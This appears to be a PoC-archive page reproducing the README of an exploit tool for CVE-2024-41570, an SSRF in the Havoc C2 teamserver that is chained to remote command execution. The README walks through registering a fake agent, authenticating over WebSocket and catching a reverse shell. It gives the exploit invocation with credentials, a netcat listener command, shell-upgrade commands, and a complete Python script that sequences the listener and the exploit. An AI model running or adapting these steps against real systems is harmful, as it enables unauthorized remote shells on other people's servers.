Associated vulnerability
Title:
Havoc security vulnerability
(CVE-2024-41570)
Description: Havoc is a modern and malleable post-exploitation command and control framework open-sourced by Havoc Framework. Havoc 2 0.7 contains an unauthenticated server-side request forgery (SSRF) vulnerability in the demon callback handling, which lets an attacker make the team server send arbitrary network traffic on their behalf.
Description
Automated Reverse Shell Exploit via WebSocket | Havoc-C2-SSRF with RCE
Introduction
# CVE-2024-41570 | Havoc C2 SSRF with RCE | Automated Reverse Shell Exploit via WebSocket
This project provides a Python-based proof-of-concept (PoC) script for CVE-2024-41570, an unauthenticated SSRF in the Havoc teamserver's demon (agent) callback handling. The script registers a fake agent with the target listener, uses the SSRF to open a WebSocket to the teamserver's own management interface, authenticates with operator credentials, and then executes a command on the teamserver host to establish a reverse shell.
## Features
- Registers a fake demon agent with the target Havoc listener.
- Opens a WebSocket to the teamserver through the SSRF and sends the handshake and authentication payloads.
- Executes a command on the teamserver host that connects back to your listener with a reverse shell.
- Provides a guided workflow with clear instructions.
## Prerequisites
- Python 3.x installed on your machine.
- Install required dependencies by running:
```bash
pip install -r requirements.txt
```
## Installation
1. Clone this repository:
```bash
git clone https://github.com/<your-repo-name>.git
```
2. Navigate to the project directory:
```bash
cd CVE-2024-41570
```
3. Install dependencies:
```bash
pip install -r requirements.txt
```
## Usage
Run the script with the required arguments:
```bash
python3 exploit.py -t <target_url> -i <teamserver_ip> -p <teamserver_port> -U <username> -P <password> -l <listener_ip> -L <listener_port>
```
### Arguments
- `-t`: Target URL of the vulnerable Havoc listener (HTTP/HTTPS) that the fake agent registers with.
- `-i`: IP address of the Havoc teamserver as seen from the teamserver itself, because the WebSocket connection originates there via the SSRF (hence `127.0.0.1` in the example below).
- `-p`: Port of the teamserver's WebSocket management interface (Havoc's default is `40056`).
- `-U`: Havoc operator username used to authenticate over the WebSocket.
- `-P`: Password for that operator account.
- `-l`: Listener IP for the reverse shell (your machine; it must be reachable from the teamserver host).
- `-L`: Listener port for the reverse shell (your machine).
### Example Command
```bash
python3 exploit.py -t http://example.com -i 127.0.0.1 -p 40056 -U 'havocuser' -P 'password123' -l 192.168.1.2 -L 4444
```
### Steps to Execute
1. Ensure the target service is running and vulnerable: the URL passed with `-t` must be a reachable Havoc listener, and the credentials passed with `-U`/`-P` must be valid for the teamserver.
2. In a separate terminal, start a listener on the port you will pass with `-L` before running the script, so the callback has something to connect to:
```bash
nc -lvnp <listener_port>
```
3. Run the script with the required parameters (see the example command above).
4. Once the shell connects, upgrade it (use `python3` if the teamserver host has no `python` binary; adjust `rows`/`columns` to your terminal):
```bash
python -c 'import pty; pty.spawn("/bin/bash")'
export TERM=xterm-256color
stty rows 67 columns 318
```
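The steps above have an ordering dependency that is easy to get wrong: if `exploit.py` fires before `nc` is bound, the callback is lost and the teamserver-side command has already run. The following orchestrator, added here as an example and not part of the original repository, starts the catcher first, confirms the port is actually listening by parsing `ss -ltn`, and only then launches `exploit.py` with the argument names documented in this README. It assumes `exploit.py` is in the current directory and that `ss` and `nc` are available on your machine; `listener_bound` and `build_exploit_argv` are helper names chosen for this example.

```python
"""Run the reverse-shell catcher, wait until it is bound, then launch exploit.py.

Added example for the README's "Steps to Execute"; not part of the PoC itself.
Assumptions: exploit.py is in the current directory and accepts the documented
-t/-i/-p/-U/-P/-l/-L flags; `ss` and `nc` exist locally.
"""
import argparse
import re
import subprocess
import sys
import time


def build_exploit_argv(target, ts_ip, ts_port, user, password, lhost, lport):
    """Build the exploit.py command line exactly as the README documents it."""
    return [
        sys.executable, "exploit.py",
        "-t", target,
        "-i", ts_ip, "-p", str(ts_port),
        "-U", user, "-P", password,
        "-l", lhost, "-L", str(lport),
    ]


def listener_bound(ss_output, port):
    """Return True if `ss -ltn` output shows a TCP socket LISTENing on `port`.

    Matches the Local Address:Port column in its IPv4 (0.0.0.0:4444),
    IPv6 ([::]:4444) and wildcard (*:4444) forms, and does not match
    ports that merely end in the same digits (e.g. 44444 for 4444).
    """
    pattern = re.compile(r"^LISTEN\s+\S+\s+\S+\s+\S+:%d\s" % int(port))
    return any(pattern.match(line.strip()) for line in ss_output.splitlines())


def wait_for_listener(port, timeout=10.0):
    """Poll `ss -ltn` until the catcher is bound or the timeout expires."""
    deadline = time.monotonic() + timeout
    while time.monotonic() < deadline:
        out = subprocess.run(["ss", "-ltn"], capture_output=True,
                             text=True, check=False).stdout
        if listener_bound(out, port):
            return True
        time.sleep(0.5)
    return False


def main():
    ap = argparse.ArgumentParser(description="Start nc, then run exploit.py")
    for flag, dest in [("-t", "target"), ("-i", "ts_ip"), ("-p", "ts_port"),
                       ("-U", "user"), ("-P", "password"),
                       ("-l", "lhost"), ("-L", "lport")]:
        ap.add_argument(flag, dest=dest, required=True)
    a = ap.parse_args()

    # README step 2, done first: nc inherits the terminal so you can interact
    # with (and later upgrade) the shell directly.
    catcher = subprocess.Popen(["nc", "-lvnp", str(a.lport)])
    if not wait_for_listener(a.lport):
        catcher.kill()
        sys.exit("listener on port %s never bound; is nc installed and the port free?"
                 % a.lport)

    # README step 3, only after the listener is confirmed bound. Exploit output
    # goes to a log file so it does not interleave with the shell session.
    argv = build_exploit_argv(a.target, a.ts_ip, a.ts_port,
                              a.user, a.password, a.lhost, a.lport)
    with open("exploit.log", "w") as log:
        exploit = subprocess.Popen(argv, stdout=log, stderr=subprocess.STDOUT)
    print("[*] exploit.py launched; output in exploit.log", file=sys.stderr)
    try:
        catcher.wait()  # returns when you exit the reverse shell
    finally:
        if exploit.poll() is None:
            exploit.terminate()


if __name__ == "__main__":
    main()
```

Invoke it with the same flags as `exploit.py` (for example `python3 run.py -t http://example.com -i 127.0.0.1 -p 40056 -U havocuser -P password123 -l 192.168.1.2 -L 4444`); the `ss` check is what guarantees the callback is never fired into an unbound port.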
## Dependencies
The script requires the following Python libraries:
- `requests`
- `pycryptodome`
Install them using the command:
```bash
pip install -r requirements.txt
```
## Security Notice
This script is intended for educational purposes only. Ensure you have explicit authorization to test the target system. Misuse of this script may violate laws and ethical guidelines.
## References
Inspired by the original [Havoc-C2-SSRF-poc by chebuya](https://github.com/chebuya/Havoc-C2-SSRF-poc).
## Contributing
Contributions are welcome! Feel free to fork the repository and submit a pull request.
## License
This project is licensed under the MIT License. See the LICENSE file for details.
File snapshot
[4.0K] /data/pocs/b82537a7d0a3940037eb8014c7f3e804d75b4233
├── [9.2K] exploit.py
├── [1.0K] LICENSE
├── [2.7K] README.md
└── [ 60] requirements.txt
0 directories, 4 files
Remarks
1. It is recommended to obtain the PoC from the original source first.
2. If the source has been removed or cannot be reached, send an e-mail to f.jinxu#gmail.com to request the local snapshot (replace # with @).
3. Shenlong has taken a snapshot of the PoC code for you; to support long-term maintenance, please consider paying for the local PoC. Thank you for your support.